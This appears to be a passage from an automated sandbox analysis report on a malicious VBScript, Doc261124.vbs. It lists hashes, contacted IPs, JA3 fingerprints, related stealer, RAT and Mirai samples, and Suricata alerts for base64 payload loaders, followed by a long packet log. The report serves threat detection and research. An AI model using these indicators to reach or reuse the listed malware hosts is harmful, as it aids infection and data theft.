                                                                                                                                                                      EPTMAcgvNZ.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      2ehwX6LWt3.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Mzo6BdEtGv.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      DFNVereinzurFoerderungeinesDeutschenForschungsnetzeseNew RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      Order Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      fbot.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                      • 141.14.194.207
                                                                                                                                                                      fbot.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                      • 132.252.36.195
                                                                                                                                                                      la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 129.217.110.41
                                                                                                                                                                      la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 141.33.15.156
                                                                                                                                                                      la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 141.65.107.191
                                                                                                                                                                      la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 139.6.130.67
                                                                                                                                                                      OC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      UK2NET-ASGBloligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                      • 80.209.188.4
                                                                                                                                                                      ajbKFgQ0Fl.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 45.80.158.23
                                                                                                                                                                      8UUxoKYpTx.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                      • 173.244.199.148
                                                                                                                                                                      la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 83.170.86.99
                                                                                                                                                                      D6wsFZIM58.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 77.92.65.63
                                                                                                                                                                      na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                      • 77.92.65.81
                                                                                                                                                                      vEOTtk6FeG.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                      • 77.92.77.76
                                                                                                                                                                      QoN2q1e0vd.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                      • 77.92.90.86
                                                                                                                                                                      na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 173.244.199.122
                                                                                                                                                                      x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                      • 77.92.65.54

                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      54328bd36c14bd82ddaa0c04b25ed9adPACKING_LIST_DOCUMENT_BQG9390309727.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, PureLog Stealer, RedLine, XWormBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      jbuESggTv0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      tJzfnaqOxj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      LAQfpnQvPQ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eTransferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      DHL-SHIPMENT-DOCUMENT-BILL-OF-LADING-PACKING-LIST.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, PureLog Stealer, RedLine, XWormBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1FHG538JGH835DG86S.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 104.21.84.67
                                                                                                                                                                      RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 104.21.84.67
                                                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                      • 104.21.84.67
                                                                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 104.21.84.67
                                                                                                                                                                      EPTMAcgvNZ.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                      • 104.21.84.67
                                                                                                                                                                      AWkpqJMxci.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                      • 104.21.84.67
                                                                                                                                                                      D2pQ4J4GGZ.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                      • 104.21.84.67
                                                                                                                                                                      C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                      • 104.21.84.67
                                                                                                                                                                      2jbMIxCFsK.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                                                                                      • 104.21.84.67
                                                                                                                                                                      9oKqST-uPDy7iigkXM-C5J2.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 104.21.84.67

                                                                                                                                                                      Dropped Files

                                                                                                                                                                      No context

                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):9434
                                                                                                                                                                      Entropy (8bit):4.928515784730612
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                                                                                      MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                                                                                      SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                                                                                      SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                                                                                      SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                      Entropy (8bit):1.1940658735648508
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Nlllulp77th:NllU
                                                                                                                                                                      MD5:7B5F360646F3167812DC4ADF7B166512
                                                                                                                                                                      SHA1:F00A325C611E6C9CC6D2069C0FEAE54C6B7E48E5
                                                                                                                                                                      SHA-256:672CD1B39FD62CBC4EEAC339C7863E190A95CEF4DDCEF0F4A5BE946E098B63B0
                                                                                                                                                                      SHA-512:7CA2CD8F0A6E6388628AC33A539DB661FCFFE08453DFACFE353B18B548ABC08072BF2FDAE40EEEA671137FE137177ADB4E322D9C77CDE8B6AADE7600EA4C18E0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      Preview:@...e.................................x..............@..........

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dr3j35r3.rmz.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dze4zu5n.yci.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvunym5x.lfk.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oladwpdq.wal.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      Static File Info

                                                                                                                                                                      General

                                                                                                                                                                      File type:Unicode text, UTF-16, little-endian text, with very long lines (583), with CRLF line terminators
                                                                                                                                                                      Entropy (8bit):3.8278091745240843
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                                                                                                                                      • MP3 audio (1001/1) 32.22%
                                                                                                                                                                      • Lumena CEL bitmap (63/63) 2.03%
                                                                                                                                                                      • Corel Photo Paint (41/41) 1.32%
                                                                                                                                                                      File name:Doc261124.vbs
                                                                                                                                                                      File size:12'984 bytes
                                                                                                                                                                      MD5:3e9ccaacccb792299a0b1c12b537817e
                                                                                                                                                                      SHA1:4f2707cf3bc5216ab4e41265c00a9264edb3edd6
                                                                                                                                                                      SHA256:5a813cfc61c2b1c738d0c5785812dc28f461631a70d98b970fc9810f709dbd94
                                                                                                                                                                      SHA512:aa45151a19fcc6abc57c0223cc741dcd271083153bf960df9a291cb8b4ec7737916652b3a8f7065e20a27ee2544e38839e0bb8e8ceb722e108ea13421d3dc826
                                                                                                                                                                      SSDEEP:192:aeyyqW7XqvgA8ECXXgxQBWMb91LLf5yyfUeLwVwwybyYkpucH2gkSCXXZMnrMDPr:+IvYWgymMDPPmZOtBOWeu8GHRk8/
                                                                                                                                                                      TLSH:29429F16A3EA4608F2F31F29A87651684E37BE166D78D25D02AC580E0FF3E44D934B73
                                                                                                                                                                      File Content Preview:..........F.u.n.c.t.i.o.n. .a.p.a.n.i.c.a.r.(.p.r.i.n.t.T.i.c.k.e.t.,. .s.c.r.i.p.t.C.o.n.t.e.x.t.,. .p.r.i.n.t.C.a.p.a.b.i.l.i.t.i.e.s.)..... . . . .D.i.m. .d.u.n.a.,. .l.e.u.c.t.r.a.s..... . . . .S.e.t. .d.u.n.a. .=. .p.r.i.n.t.C.a.p.a.b.i.l.i.t.i.e.s..

                                                                                                                                                                      File Icon

                                                                                                                                                                      Icon Hash:68d69b8f86ab9a86

                                                                                                                                                                      Network Behavior

                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                      2024-11-26T09:32:42.115660+01002057635ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound15.182.211.14980192.168.2.849711TCP
                                                                                                                                                                      2024-11-26T09:32:42.115660+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)15.182.211.14980192.168.2.849711TCP
                                                                                                                                                                      2024-11-26T09:32:50.785311+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849706104.21.84.67443TCP
                                                                                                                                                                      2024-11-26T09:33:01.135577+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21193.30.119.205443192.168.2.849707TCP
                                                                                                                                                                      2024-11-26T09:33:21.237828+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849712193.122.6.16880TCP
                                                                                                                                                                      2024-11-26T09:33:24.003462+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849712193.122.6.16880TCP
                                                                                                                                                                      2024-11-26T09:33:25.683925+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849714172.67.177.134443TCP
                                                                                                                                                                      2024-11-26T09:33:27.222225+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849715193.122.6.16880TCP
                                                                                                                                                                      2024-11-26T09:33:41.335289+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849724172.67.177.134443TCP
                                                                                                                                                                      2024-11-26T09:33:47.793673+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849728172.67.177.134443TCP

                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                      TCP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Nov 26, 2024 09:32:48.144557953 CET4970580192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:48.264918089 CET8049705104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:48.265012026 CET4970580192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:48.265235901 CET4970580192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:48.385272026 CET8049705104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:49.490083933 CET8049705104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:49.545972109 CET4970580192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:49.556854963 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:49.556911945 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:49.556997061 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:49.567167997 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:49.567186117 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:49.666966915 CET8049705104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:49.667015076 CET4970580192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:50.785228014 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:50.785310984 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:50.787592888 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:50.787597895 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:50.787873983 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:50.831604958 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:50.840276003 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:50.883368015 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.293695927 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.293802023 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.293840885 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.293849945 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.293858051 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.293912888 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.293922901 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.293926954 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.293957949 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.302666903 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.347172976 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.347177982 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.394021034 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.394026995 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.414207935 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.414309025 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.414320946 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.456960917 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.456967115 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.489492893 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.489559889 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.489564896 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.497802973 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.497840881 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.497862101 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.497867107 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.497946978 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.506309032 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.515837908 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.515906096 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.515911102 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.523137093 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.523334980 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.523339987 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.531836033 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.531949997 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.531954050 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.539916992 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.540050030 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.540055037 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.551265955 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.551330090 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.551333904 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.558347940 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.558455944 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.558459997 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.565346003 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.565403938 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.565408945 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.580212116 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.580336094 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.580380917 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.580385923 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.580538988 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.677191019 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.679584026 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.679676056 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.679686069 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.684406996 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.684452057 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.684461117 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.694104910 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.694124937 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.694200039 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.694200039 CET49706443192.168.2.8104.21.84.67
